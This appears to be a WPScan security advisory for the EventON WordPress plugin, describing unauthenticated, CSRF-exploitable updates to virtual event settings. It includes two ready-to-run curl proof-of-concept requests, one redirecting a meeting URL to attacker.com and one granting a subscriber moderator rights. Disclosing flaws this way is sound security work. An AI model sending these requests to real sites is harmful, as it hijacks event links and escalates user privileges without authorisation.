Lucene search

Erwan LR (WPScan)WPEX-ID:73D1B00E-1F17-4D9A-BFC8-6BC43A46B90B

HistoryJan 10, 2024 - 12:00 a.m.

EventON (Free < 2.2.9, Premium < 4.5.9) - Unauthenticated Virtual Event Settings Update

2024-01-1000:00:00

Erwan LR (WPScan)

eventon

plugin

unauthenticated

virtual event

settings

vulnerability

meeting url

attack

csrf

exploit

premium

free

nonce verification

5.4 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

20.7%

JSON

Description The plugins do not have authorisation and CSRF in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'

To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:

curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'

v4.5.8 of the premium plugin added capability and CRSF checks, however the nonce verification is flawed, still allowing the issue to be exploited via CSRF